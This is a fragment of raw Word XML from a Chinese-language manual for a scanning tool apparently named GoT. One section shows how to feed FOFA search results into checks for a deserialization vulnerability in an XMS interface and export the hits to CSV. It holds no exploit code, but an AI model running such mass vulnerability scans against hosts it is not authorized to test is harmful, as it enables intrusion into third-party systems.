            <w:r w:rsidRPr="00FF3E9B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>response_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6458" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C624F44" w14:textId="45BFA62F" w:rsidR="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网站响应超时时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="112D49D9" w14:textId="77777777" w:rsidR="00FF3E9B" w:rsidRPr="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA673DF" w14:textId="547F0790" w:rsidR="00145F0E" w:rsidRPr="00145F0E" w:rsidRDefault="00145F0E" w:rsidP="00145F0E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ofa联动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E5BCED" w14:textId="7907F6B0" w:rsidR="00145F0E" w:rsidRDefault="00145F0E" w:rsidP="00145F0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开setting.json文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405375DC" w14:textId="140E92C7" w:rsidR="00145F0E" w:rsidRDefault="00145F0E" w:rsidP="00145F0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E218D13" wp14:editId="54D57A67">
            <wp:extent cx="5274310" cy="1873250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="398066626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66626" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件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30EB" w14:textId="1965C0CE" w:rsidR="00F9149A" w:rsidRDefault="00F9149A" w:rsidP="00145F0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填入fofa的信息，默认vip是一万条信息一次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E51007" w14:textId="5C71B6EB" w:rsidR="00145F0E" w:rsidRDefault="00B765A2" w:rsidP="00145F0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11832F97" wp14:editId="70C55BA4">
            <wp:extent cx="3162574" cy="1798476"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10174498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4988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35DA" w14:textId="7CE23354" w:rsidR="00F9149A" w:rsidRDefault="00F9149A" w:rsidP="00145F0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D7FD43" w14:textId="1B4F6353" w:rsidR="00F9149A" w:rsidRDefault="00F9149A" w:rsidP="00145F0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GoT </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9149A">
        <w:t xml:space="preserve">fofa -condition vuln="西软云XMS_FoxLookupInvoker接口存在反序列化漏洞" -proxy </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00571E58">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8080</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -export csv=123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C956369" w14:textId="58EFB191" w:rsidR="00DA7B80" w:rsidRDefault="00DA7B80" w:rsidP="00145F0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接从fofa中取出数据随后进行漏洞验证并导出到123.csv文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87BA43" w14:textId="2EAB4B38" w:rsidR="00F9149A" w:rsidRPr="00145F0E" w:rsidRDefault="00F9149A" w:rsidP="00145F0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C717802" wp14:editId="3981889F">
            <wp:extent cx="5274310" cy="4149090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="116611263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12631" name="图片 1" descr="文本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149A" w:rsidRPr="00145F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F15135"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EAE76D8"/>
    <w:lvl w:ilvl="0" w:tplc="67545EB8">
      <w:start w:val="3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07239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83F"/>
    <w:rsid w:val="000201E8"/>
    <w:rsid w:val="00040B68"/>
    <w:rsid w:val="00145F0E"/>
    <w:rsid w:val="00191D11"/>
    <w:rsid w:val="001A77CA"/>
    <w:rsid w:val="00212ECC"/>
    <w:rsid w:val="00255743"/>
    <w:rsid w:val="0029783B"/>
    <w:rsid w:val="002A3C23"/>
    <w:rsid w:val="00306EB7"/>
    <w:rsid w:val="00415B3E"/>
    <w:rsid w:val="0053606E"/>
    <w:rsid w:val="00560EB9"/>
    <w:rsid w:val="0058730D"/>
    <w:rsid w:val="00650564"/>
    <w:rsid w:val="006726E2"/>
    <w:rsid w:val="006B4C2D"/>
    <w:rsid w:val="006E4760"/>
    <w:rsid w:val="006F6ADA"/>
    <w:rsid w:val="007211EF"/>
    <w:rsid w:val="007916F4"/>
    <w:rsid w:val="007E6521"/>
    <w:rsid w:val="0086307D"/>
    <w:rsid w:val="008A3D6E"/>
    <w:rsid w:val="008A401F"/>
    <w:rsid w:val="008B74F0"/>
    <w:rsid w:val="008C040F"/>
    <w:rsid w:val="009266B4"/>
    <w:rsid w:val="00985A8B"/>
    <w:rsid w:val="00985C7E"/>
    <w:rsid w:val="009F60F5"/>
    <w:rsid w:val="00A055B3"/>
    <w:rsid w:val="00A27972"/>
    <w:rsid w:val="00A3418C"/>
    <w:rsid w:val="00A44207"/>
    <w:rsid w:val="00A7083F"/>
    <w:rsid w:val="00AB2C99"/>
    <w:rsid w:val="00AB61A5"/>
    <w:rsid w:val="00AE1C5D"/>
    <w:rsid w:val="00B765A2"/>
    <w:rsid w:val="00B83F59"/>
    <w:rsid w:val="00C17A30"/>
    <w:rsid w:val="00C56E79"/>
    <w:rsid w:val="00C87C36"/>
    <w:rsid w:val="00C937D0"/>
    <w:rsid w:val="00CC5DCD"/>
    <w:rsid w:val="00D8523E"/>
    <w:rsid w:val="00DA38A7"/>
    <w:rsid w:val="00DA5212"/>
    <w:rsid w:val="00DA7B80"/>
    <w:rsid w:val="00DB494A"/>
    <w:rsid w:val="00DC764F"/>
    <w:rsid w:val="00DF258B"/>
    <w:rsid w:val="00E121F5"/>
    <w:rsid w:val="00E95F9A"/>
    <w:rsid w:val="00E97F6B"/>
    <w:rsid w:val="00F424AF"/>
    <w:rsid w:val="00F70D54"/>
    <w:rsid w:val="00F9149A"/>
    <w:rsid w:val="00FB5A90"/>
    <w:rsid w:val="00FC20C9"/>
    <w:rsid w:val="00FD327E"/>
    <w:rsid w:val="00FD77EC"/>
    <w:rsid w:val="00FE722E"/>
    <w:rsid w:val="00FF0906"/>
    <w:rsid w:val="00FF3E9B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2F65C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3414192B-31D0-42CD-A6D5-67B610FE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083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708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A708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7083F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7083F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7083F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083F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083F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083F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7083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A708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A708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7083F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A7083F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A7083F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7083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7083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7083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7083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708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7083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7083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7083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7083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7083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7083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708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7083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7083F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DF258B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DF258B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985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E4760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6E476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6E4760"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="2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6E476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71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hyperlink" Target="http://127.0.0.1:8080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sqlitebrowser.org/dl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90C81-D5BD-4A7E-A7B2-9A28D357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8</Pages>
  <Words>1089</Words>
  <Characters>6209</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>51</Lines>
  <Paragraphs>14</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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e HE</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Zone HE</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-09T15:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-05T08:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>